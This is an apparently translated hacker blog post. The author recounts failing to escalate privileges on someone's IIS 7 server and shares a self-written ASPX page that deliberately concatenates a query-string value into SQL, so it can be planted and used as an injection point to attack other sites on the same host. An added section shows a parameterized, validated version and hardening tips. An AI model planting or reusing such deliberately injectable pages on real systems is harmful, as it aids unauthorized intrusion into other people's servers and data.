Yesterday I was looking at a site with 4z1. Privilege escalation was really hard; we stared at it for a full five hours with no result. Server 2008 + IIS 7, no sa, no root, none of the usual services...
In the process we needed to build an aspx injection page to go cross-site. I found a pile of code online, and not one of them worked.
It isn't much code, so I just wrote my own. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    // The connection string is read from web.config; "连接名" is the placeholder connection name
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
    conn.Open();

    // The value comes straight from the query string: ?xxser=1
    string i = this.Page.Request.Params["xxser"];

    // The parameter is concatenated into the SQL text unchanged; that is what makes this page injectable
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    // ExecuteNonQuery returns -1 for a SELECT; the page only needs the statement to run (and any error to surface)
    int x = command.ExecuteNonQuery();

    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}
</script>
</div>
</form>
</body>
</html>
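For contrast, here is the defensive counterpart of the same lookup. This is an added example, not the poster's code: it shows what the page looks like when the query-string value is validated and bound as a typed SqlParameter instead of being concatenated into the SQL text. The connection name `Main`, table `Users` and column `Id` are assumed placeholders.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
// Added example (not the original poster's code): the same lookup with the
// query-string value bound as a typed parameter, so it can never alter the statement.
// "Main", "Users" and "Id" are assumed placeholder names.

void Page_Init(object sender, EventArgs e)
{
    string raw = Request.QueryString["xxser"];

    // 1. Validate the shape of the input before it goes anywhere near SQL.
    //    Anything that is not an integer is rejected here with a 400.
    int id;
    if (!int.TryParse(raw, out id))
    {
        Response.StatusCode = 400;
        Response.Write("xxser must be an integer");
        return;
    }

    string cs = ConfigurationManager.ConnectionStrings["Main"].ConnectionString;

    // 2. using blocks guarantee the connection and command are disposed even if an exception is thrown.
    using (SqlConnection conn = new SqlConnection(cs))
    using (SqlCommand cmd = new SqlCommand("SELECT COUNT(*) FROM [Users] WHERE [Id] = @id", conn))
    {
        // 3. Bind a typed parameter: the driver sends the value separately from the statement text,
        //    so the input is always treated as data, never as SQL.
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;

        conn.Open();
        // ExecuteScalar returns the first column of the first row, i.e. the COUNT.
        int count = (int)cmd.ExecuteScalar();

        // 4. HTML-encode anything reflected back so the SQL fix does not leave an XSS bug behind.
        Response.Write(Server.HtmlEncode(raw) + "\n");
        Response.Write(count);
    }
}
</script>
```

Two other things worth checking on a page like this: the account named in the connection string should hold only the rights the page needs (SELECT on the one table, no sysadmin membership), and a failed parse or a SQL exception should never echo the raw statement or the driver's error text back to the client, since that detail is exactly what makes error-based injection practical against the concatenated version.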